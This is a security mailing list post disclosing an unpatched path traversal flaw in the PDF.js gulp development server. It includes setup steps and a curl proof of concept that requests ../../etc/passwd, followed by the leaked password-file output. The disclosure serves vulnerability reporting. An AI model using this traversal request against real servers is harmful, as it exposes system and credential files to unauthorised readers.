oss-sec mailing list archives
Path traversal in mozilla PDF.js [Unpatched]
From: Dhiraj Mishra <mishra.dhiraj95 () gmail com>
Date: Sat, 24 Nov 2018 13:16:49 +0530
## Summary A path traversal issue was observed in Mozilla PDF.js which is a PDF reader in JavaScript. This issue was observed while code review of PDF.js (gulpfile.js)( https://github.com/mozilla/pdf.js/blob/master/gulpfile.js#L1023), Mozilla team says "The server with pdf.js is intended to be a development server and should not be exposed to public networks. I suppose we could update the docs to state that." and a upstream bug was filed against the same ( https://github.com/mozilla/pdf.js/issues/10249). ## Installation PDF.js is built into version 19+ of firefox and a chrome extension is also available on chrome web store. To install and get a local copy of PDF.js here are the below steps : $ git clone https://github.com/mozilla/pdf.js.git $ cd pdf.js $ npm install -g gulp-cli $ npm install $ gulp server ##Exploitation I've used the attribute --path-as-is from cURL to verify this issue. $ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
GET /../../../../../../etc/passwd HTTP/1.1 Host: 127.0.0.1:8888 User-Agent: curl/7.58.0 Accept: */*
< HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Type: application/octet-stream < Content-Length: 2745 < Date: Thu, 15 Nov 2018 06:34:32 GMT < Connection: keep-alive < root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync Thank you Dhiraj (@mishradhiraj_)
Current thread:
- Path traversal in mozilla PDF.js [Unpatched] Dhiraj Mishra (Nov 24)